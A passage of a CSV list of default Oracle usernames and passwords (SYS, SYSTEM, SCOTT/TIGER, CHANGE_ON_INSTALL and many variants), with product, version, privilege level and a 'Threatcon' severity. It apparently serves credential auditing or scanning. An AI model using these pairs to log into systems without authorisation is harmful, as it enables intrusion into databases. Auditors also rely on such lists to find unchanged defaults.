serious),,\noracle,Database,Any,,PORTAL_APP,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_DEMO,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_DEMO,PORTAL_DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_DEMO,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_PUBLIC,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_PUBLIC,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PORTAL_SSO_PS,PORTAL_SSO_PS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,POS,POS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,POWERCARTUSER,POWERCARTUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PRIMARY,PRIMARY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PSA,PSA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PSB,PSB,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PSP,PSP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,PUBSUB,PUBSUB,Threatcon 1 (most serious),,\noracle,Database,Any,,PUBSUB1,PUBSUB1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,PV,PV,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,QA,QA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,QDBA,QDBA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QP,QP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,QS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS,QS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,QS_ADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ADM,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,QS_CB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CB,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,QS_CBADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CBADM,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,QS_CS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_CS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,QS_ES,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_ES,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,QS_OS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_OS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,QS_WS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,QS_WS,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,RE,RE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REPADMIN,REPADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REPORTS,REPORTS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REPORTS_USER,OEM_TEMP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_MANAGER,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_OWNER,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_OWNER,REP_OWNER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,REP_USER,DEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,RG,RG,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RHX,RHX,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RLA,RLA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RLM,RLM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RMAIL,RMAIL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,RMAN,RMAN,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,RRS,RRS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SAMPLE,SAMPLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SAP,6071992,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SAP,SAPR3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SAPR3,SAP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SCOTT,TIGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SCOTT,TIGGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SDOS_ICSAP,SDOS_ICSAP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SECDEMO,SECDEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SERVICECONSUMER1,SERVICECONSUMER1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,SH,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SH,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SITEMINDER,SITEMINDER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SI_INFORMTN_SCHEMA,SI_INFORMTN_SCHEMA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SLIDE,SLIDEPW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SPIERSON,SPIERSON,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SSP,SSP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,STARTER,STARTER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,STRAT_USER,STRAT_PASSWD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SWPRO,SWPRO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SWUSER,SWUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYMPA,SYMPA,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYS,0RACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL38,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL38I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL39,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACL39I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,0RACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,CHANGE_ON_INSTALL,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,D_SYSPW,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,MANAG3R,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,MANAGER,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,SYS,ORACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,ORACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,SYS,Threatcon 1 (most serious),,\noracle,Database,Any,,SYS,SYSPASS,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSADM,SYSADM,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSADMIN,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSADMIN,SYSADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSADMIN,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,SYSMAN,OEM_TEMP,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSMAN,SYSMAN,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL38,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL38I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL39,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACL39I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,0RACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,CHANGE_ON_INSTALL,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,SYSTEM,D_SYSPW,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,D_SYSTPW,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,MANAG3R,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,MANAGER,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACL3,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE8,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE8I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE9,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,ORACLE9I,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,SYSTEM,Threatcon 1 (most serious),,\noracle,Database,Any,,SYSTEM,SYSTEMPASS,Threatcon 1 (most serious),,\noracle,Database,Any,,TAHITI,TAHITI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TALBOT,MT6CH5,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TDOS_ICSAP,TDOS_ICSAP,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEC,TECTEC,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEST,PASSWD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEST,TEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TESTPILOT,TESTPILOT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TEST_USER,TEST_USER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,THINSAMPLE,THINSAMPLEPW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TIBCO,TIBCO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TIP37,TIP37,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TRACESVR,TRACE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TRAVEL,TRAVEL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TSDEV,TSDEV,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TSUSER,TSUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,TURBINE,TURBINE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UDDISYS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UDDISYS,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,ULTIMATE,ULTIMATE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UM_ADMIN,UM_ADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UM_CLIENT,UM_CLIENT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER,USER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER0,USER0,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER1,USER1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER2,USER2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER3,USER3,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER4,USER4,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER5,USER5,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER6,USER6,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER7,USER7,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER8,USER8,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER9,USER9,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USER_NAME,PASSWORD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,USUARIO,CLAVE,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UTILITY,UTILITY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,UTLBSTATU,UTLESTAT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VEA,VEA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,VEH,VEH,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,VERTEX_LOGIN,VERTEX_LOGIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VIDEOUSER,VIDEOUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VIF_DEVELOPER,VIF_DEV_PWD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VIRUSER,VIRUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VPD_ADMIN,AKF7D98S2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,VRR1,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,VRR1,VRR2,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBCAL01,WEBCAL01,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBDB,WEBDB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBREAD,WEBREAD,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBSYS,MANAGER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEBUSER,YOUR_PASS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WEST,WEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WFADMIN,WFADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WH,WH,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WIP,WIP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WIRELESS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WIRELESS,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKADMIN,WKADMIN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,UNKNOWN,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKPROXY,WKPROXY,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKSYS,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKSYS,WKSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WKUSER,WKUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_PROXY,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_PROXY,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_SYS,,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_SYS,lt;UNKNOWNgt;,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WK_TEST,WK_TEST,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WMS,WMS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WMSYS,WMSYS,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WOB,WOB,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WPS,WPS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WSH,WSH,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WSM,WSM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,WWW,WWW,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,WWWUSER,WWWUSER,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XADEMO,XADEMO,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XDB,CHANGE_ON_INSTALL,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XDP,XDP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XLA,XLA,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNC,XNC,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNI,XNI,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XNM,XNM,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNP,XNP,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XNS,XNS,Threatcon 2 (1 is most serious),,\noracle,Database,Any,,XPRT,XPRT,Threatcon 3 (1 is most serious),,\noracle,Database,Any,,XTR,XTR,Threatcon 2 (1 is most serious),,\noracle,Endeca Workbench,,,admin,admin,,,\noracle,Exadata,,,ilom-admin,ilom-admin Error,,,\noracle,Exadata,,,ilom-operator,ilom-operator,,,\noracle,Exadata,,,nm2user,nm2user,,,\noracle,Internet Directory Service,,,cn=orcladmin,welcome,,,\noracle,Internet Directory Service,,,cn=orcladmin,welcome,,any,\noracle,Oracle RDBMS,,,ADAMS,WOOD,,,\noracle,Oracle RDBMS,,,APPLSYS,APPLSYS,,,\noracle,Oracle RDBMS,,,APPS,APPS,,,\noracle,Oracle RDBMS,,,AQDEMO,AQDEMO,,,\noracle,Oracle RDBMS,,,AQUSER,AQUSER,,,\noracle,Oracle RDBMS,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,,AURORA@ORB@UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,,BLAKE,PAPER,,,\noracle,Oracle RDBMS,,,CATALOG,CATALOG,,,\noracle,Oracle RDBMS,,,CDEMO82,CDEMO82,,,\noracle,Oracle RDBMS,,,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle RDBMS,,,CDEMORID,CDEMORID,,,\noracle,Oracle RDBMS,,,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle RDBMS,,,CLARK,CLOTH,,,\noracle,Oracle RDBMS,,,CTXDEMO,CTXDEMO,,,\noracle,Oracle RDBMS,,,CTXSYS,,,,\noracle,Oracle RDBMS,,,DEMO,DEMO,,,\noracle,Oracle RDBMS,,,DEMO8,DEMO8,,,\noracle,Oracle RDBMS,,,EMP,EMP,,,\noracle,Oracle RDBMS,,,FND,FND,,,\noracle,Oracle RDBMS,,,GPFD,GPFD,,,\noracle,Oracle RDBMS,,,GPLD,GPLD,,,\noracle,Oracle RDBMS,,,JONES,STEEL,,,\noracle,Oracle RDBMS,,,MILLER,MILLER,,,\noracle,Oracle RDBMS,,,MMO2,MMO2,,,\noracle,Oracle RDBMS,,,MOREAU,MOREAU,,,\noracle,Oracle RDBMS,,,MTYSYS,MTYSYS,,,\noracle,Oracle RDBMS,,,NAMES,NAMES,,,\noracle,Oracle RDBMS,,,OCITEST,OCITEST,,,\noracle,Oracle RDBMS,,,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle RDBMS,,,ORDSYS,ORDSYS,,,\noracle,Oracle RDBMS,,,OUTLN,OUTLN,,,\noracle,Oracle RDBMS,,,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle RDBMS,,,PRIMARY,PRIMARY,,,\noracle,Oracle RDBMS,,,RE,RE,,,\noracle,Oracle RDBMS,,,RMAIL,RMAIL,,,\noracle,Oracle RDBMS,,,RMAN,RMAN,,,\noracle,Oracle RDBMS,,,SCOTT,TIGER,,,\noracle,Oracle RDBMS,,,SECDEMO,SECDEMO,,,\noracle,Oracle RDBMS,,,SYSADM,SYSADM,,,\noracle,Oracle RDBMS,,,SYSTEM,MANAGER,,,\noracle,Oracle RDBMS,,,TRACESRV,TRACE,,,\noracle,Oracle RDBMS,,,TSDEV,TSDEV,,,\noracle,Oracle RDBMS,,,TSUSER,TSUSER,,,\noracle,Oracle RDBMS,,,USER0,USER0,,,\noracle,Oracle RDBMS,,,USER1,USER1,,,\noracle,Oracle RDBMS,,,USER2,USER2,,,\noracle,Oracle RDBMS,,,USER3,USER3,,,\noracle,Oracle RDBMS,,,USER4,USER4,,,\noracle,Oracle RDBMS,,,USER5,USER5,,,\noracle,Oracle RDBMS,,,USER6,USER6,,,\noracle,Oracle RDBMS,,,USER7,USER7,,,\noracle,Oracle RDBMS,,,USER8,USER8,,,\noracle,Oracle RDBMS,,,USER9,USER9,,,\noracle,Oracle RDBMS,,7 and 8,ADAMS,WOOD,,,\noracle,Oracle RDBMS,,7 and 8,APPLSYS,APPLSYS,,,\noracle,Oracle RDBMS,,7 and 8,APPS,APPS,,,\noracle,Oracle RDBMS,,7 and 8,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,7 and 8,AURORA@ORB@UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,,7 and 8,BLAKE,PAPER,,,\noracle,Oracle RDBMS,,7 and 8,CLARK,CLOTH,,,\noracle,Oracle RDBMS,,7 and 8,CTXDEMO,CTXDEMO,,,\noracle,Oracle RDBMS,,7 and 8,CTXSYS,CTXSYS,,,\noracle,Oracle RDBMS,,7 and 8,DBSNMP,DBSNMP,,,\noracle,Oracle RDBMS,,7 and 8,DEMO,DEMO,,,\noracle,Oracle RDBMS,,7 and 8,JONES,STEEL,,,\noracle,Oracle RDBMS,,7 and 8,MDSYS,MDSYS,,,\noracle,Oracle RDBMS,,7 and 8,NAMES,NAMES,,,\noracle,Oracle RDBMS,,7 and 8,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle RDBMS,,7 and 8,ORDSYS,ORDSYS,,,\noracle,Oracle RDBMS,,7 and 8,OUTLN,OUTLN,,,\noracle,Oracle RDBMS,,7 and 8,RMAN,RMAN,,,\noracle,Oracle RDBMS,,7 and 8,SCOTT,TIGER,,,\noracle,Oracle RDBMS,,7 and 8,SYS,CHANGE_ON_INSTALL,,,\noracle,Oracle RDBMS,,7 and 8,SYSADM,SYSADM,,,\noracle,Oracle RDBMS,,7 and 8,SYSTEM,MANAGER,,,\noracle,Oracle RDBMS,,7 and 8,TRACESRV,TRACE,,,\noracle,Oracle RDBMS,,8i Linux,MODTEST,YES,,,\noracle,Oracle RDBMS,,8i WinNT,MTYSYS,MTYSYS,,,\noracle,Oracle RDBMS,,8i WinNT,RE,RE,,,\noracle,Oracle RDBMS,,8i WinNT,RMAIL,RMAIL,,,\noracle,Oracle RDBMS,,8i WinNT,SAMPLE,SAMPLE,,,\noracle,Oracle RDBMS,,8i,AQDEMO,AQDEMO,,,\noracle,Oracle RDBMS,,8i,AQUSER,AQUSER,,,\noracle,Oracle RDBMS,,8i,CATALOG,CATALOG,,,\noracle,Oracle RDBMS,,8i,CDEMO82,CDEMO82,,,\noracle,Oracle RDBMS,,8i,CDEMOCOR,CDEMOCOR,,,\noracle,Oracle RDBMS,,8i,CDEMORID,CDEMORID,,,\noracle,Oracle RDBMS,,8i,CDEMOUCB,CDEMOUCB,,,\noracle,Oracle RDBMS,,8i,COMPANY,COMPANY,,,\noracle,Oracle RDBMS,,8i,DEMO8,DEMO8,,,\noracle,Oracle RDBMS,,8i,EMP,EMP,,,\noracle,Oracle RDBMS,,8i,EVENT,EVENT,,,\noracle,Oracle RDBMS,,8i,FINANCE,FINANCE,,,\noracle,Oracle RDBMS,,8i,FND,FND,,,\noracle,Oracle RDBMS,,8i,GPFD,GPFD,,,\noracle,Oracle RDBMS,,8i,GPLD,GPLD,,,\noracle,Oracle RDBMS,,8i,MFG,MFG,,,\noracle,Oracle RDBMS,,8i,MILLER,MILLER,,,\noracle,Oracle RDBMS,,8i,MMO2,MMO2,,,\noracle,Oracle RDBMS,,8i,MOREAU,MOREAU,,,\noracle,Oracle RDBMS,,8i,OCITEST,OCITEST,,,\noracle,Oracle RDBMS,,8i,PO,PO,,,\noracle,Oracle RDBMS,,8i,POWERCARTUSER,POWERCARTUSER,,,\noracle,Oracle RDBMS,,8i,PRIMARY,PRIMARY,,,\noracle,Oracle RDBMS,,8i,PUBSUB,PUBSUB,,,\noracle,Oracle RDBMS,,8i,SECDEMO,SECDEMO,,,\noracle,Oracle RDBMS,,8i,SYSMAN,oem_temp,,,\noracle,Oracle RDBMS,,8i,TSDEV,TSDEV,,,\noracle,Oracle RDBMS,,8i,TSUSER,TSUSER,,,\noracle,Oracle RDBMS,,8i,USER0,USER0,,,\noracle,Oracle RDBMS,,8i,USER1,USER1,,,\noracle,Oracle RDBMS,,8i,USER2,USER2,,,\noracle,Oracle RDBMS,,8i,USER3,USER3,,,\noracle,Oracle RDBMS,,8i,USER4,USER4,,,\noracle,Oracle RDBMS,,8i,USER5,USER5,,,\noracle,Oracle RDBMS,,8i,USER6,USER6,,,\noracle,Oracle RDBMS,,8i,USER7,USER7,,,\noracle,Oracle RDBMS,,8i,USER8,USER8,,,\noracle,Oracle RDBMS,,8i,USER9,USER9,,,\noracle,Oracle RDBMS,,8i,VRR1,VRR1,,,\noracle,Oracle RDBMS,,All Privileges with Admin,MDSYS,MDSYS,,,\noracle,Oracle RDBMS,,All Privileges,COMPANY,COMPANY,,,\noracle,Oracle RDBMS,,All Privileges,FINANCE,FINANCE,,,\noracle,Oracle RDBMS,,All Privileges,MFG,MFG,,,\noracle,Oracle RDBMS,,DBA +,SYS,CHANGE_ON_INSTALL,,,\noracle,Oracle RDBMS,,DBA,CTXSYS,CTXSYS,,,\noracle,Oracle RDBMS,,DBA,EVENT,EVENT,,,\noracle,Oracle RDBMS,,DBA,MODTEST,YES,,,\noracle,Oracle RDBMS,,DBA,PO,PO,,,\noracle,Oracle RDBMS,,DBA,PUBSUB,PUBSUB,,,\noracle,Oracle RDBMS,,DBA,SAMPLE,SAMPLE,,,\noracle,Oracle RDBMS,,DBA,SYSMAN,oem_temp,,,\noracle,Oracle RDBMS,,DBA,VRR1,VRR1,,,\noracle,Oracle RDBMS,,RESOURCE and CONNECT roles,DBSNMP,DBSNMP,,,\noracle,Oracle RDBMS,7 and 8,Multi,ADAMS,WOOD,,,\noracle,Oracle RDBMS,7 and 8,Multi,APPLSYS,APPLSYS,,,\noracle,Oracle RDBMS,7 and 8,Multi,APPS,APPS,,,\noracle,Oracle RDBMS,7 and 8,Multi,AURORA$ORB$UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,7 and 8,Multi,AURORA@ORB@UNAUTHENTICATED,INVALID,,,\noracle,Oracle RDBMS,7 and 8,Multi,BLAKE,PAPER,,,\noracle,Oracle RDBMS,7 and 8,Multi,CLARK,CLOTH,,,\noracle,Oracle RDBMS,7 and 8,Multi,CTXDEMO,CTXDEMO,,,\noracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,,,,\noracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,CTXSYS,DBA,,\noracle,Oracle RDBMS,7 and 8,Multi,DBSNMP,DBSNMP,RESOURCE and CONNECT roles,,\noracle,Oracle RDBMS,7 and 8,Multi,DEMO,DEMO,,,\noracle,Oracle RDBMS,7 and 8,Multi,JONES,STEEL,,,\noracle,Oracle RDBMS,7 and 8,Multi,MDSYS,MDSYS,All Privileges with Admin,,\noracle,Oracle RDBMS,7 and 8,Multi,NAMES,NAMES,,,\noracle,Oracle RDBMS,7 and 8,Multi,ORDPLUGINS,ORDPLUGINS,,,\noracle,Oracle RDBMS,7 and 8,Multi,ORDSYS,ORDSYS,,,\noracle,Oracle RDBMS,7 and 8,Multi,OUTLN,OUTLN,,,\noracle,Oracle RDBMS,7 and 8,Multi,RMAN,RMAN,,,\noracle,Oracle RDBMS,7 and 8,Multi,SCOTT,TIGER,,,\noracle,Oracle RDBMS,7 and 8,Multi,SYS,CHANGE_ON_INSTALL,DBA +,,\noracle,Oracle 